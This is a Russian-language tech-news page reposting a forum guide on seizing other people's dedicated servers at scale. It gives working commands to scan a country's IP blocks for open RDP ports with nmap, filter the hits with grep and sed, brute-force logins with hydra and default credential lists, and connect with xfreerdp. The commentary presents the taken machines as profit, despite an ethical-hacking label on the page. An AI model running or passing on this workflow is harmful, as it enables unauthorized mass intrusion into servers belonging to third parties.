Bestfilez.net - новости мира Hi-tech
18.09.24  
Последние новости
24 Январь 2019
24 Январь 2019
24 Январь 2019
24 Январь 2019
24 Январь 2019
24 Январь 2019
24 Январь 2019
24 Январь 2019
24 Январь 2019
24 Январь 2019
24 Январь 2019
24 Январь 2019
Этичный хакинг и тестирование на проникновение

В поисках лучшего алгоритма по захвату дедиков в 2К18



CYBERSATORI EXPERIENCE 4 CAPTURE DEDICATED SERVERS ON LINUX SYSTEM // Мой опыт захвата дэдиксов с Лилы

CREATE NMAP SCRIPT FILE (Input All Major-IP Blocks of any Country here): // Оборачиваем следующие пару строк в скрипт, создаём пару txt-шек
http://www.ipdeny.com/ipblocks/ здесь можно посмотреть списки ипи-блоков по интересующей стране, но если воткнёте в подскан все разом, результаты придут к следующему году, так что не жадничаем и по-немножку сканим интересующую подсеть. Ведём журнал, записываем в блокнотик исследованые диапазоны.

c='Path/To/Your/Script/Here'
nmap -sS -p3389 -PS3389 -oG $c/scannedOnlineServers.txt -iL $c/hostsIPRange.txt -vv

CREATE PARSER FILE (to select only OK IP's list): // создаём сортировочную машинку которая извлечёт нам ипишки с открытым RDP портом.

p='/Path/To/Your/Script/Here'
grep -E '/open/' $p/scannedOnlineServers.txt | sed 's/Host: //' > $p/scanGhostFile.txt
sed 's/ .*//' $p/scanGhostFile.txt | sort | uniq -u > $p/openedServers.txt
sed 's/ .*//' $p/scanGhostFile.txt | sort | uniq -d » $p/openedServers.txt
rm $p/scanGhostFile.txt

PUT HYDRA COMAND (Best 4 Brute on Linux or use Metasploit experience): //ничего веселее гидры не нашлось, crowbar даёт ложные пробои и станится, поэтому загружаем пару топ-10 словарей (admin - password) и берём так сказать количеством, гидра хороша тем что не сильно нагружает процессор и в фоновом режиме может брутить сутки на пролёт не сильно задевая чувства верующих. В идеале думаю полезно разобраться и эксплойтить отсортированые ипишечки с Metasploit - но это уже тема для другой статьи, так как быстрых стандартных решений этого вопроса я пока не вижу.

hydra -L (loginTop10listHere) -P (passTop10listHere) -M (openedServersHere) -vV -o (SavedOKServers) rdp
TO CONTROL REMOTE DESKTOP : // входим в сбрученые оболочки и получаем профит

xfreerdp /u:LOGIN /p:PASSWORD /v:IP:3389

Источник: https://codeby.net/threads/v-poiskax-luchshego-algoritma-po-zaxvatu-dedikov-v-2k18.63757/

Опубликовано 24 Январь 2019 Sunnych

Новости Hi-tech
Яндекс.Метрика

sitemap sitemap.xml
Сайт сделан на SiNG cms © 2010-2020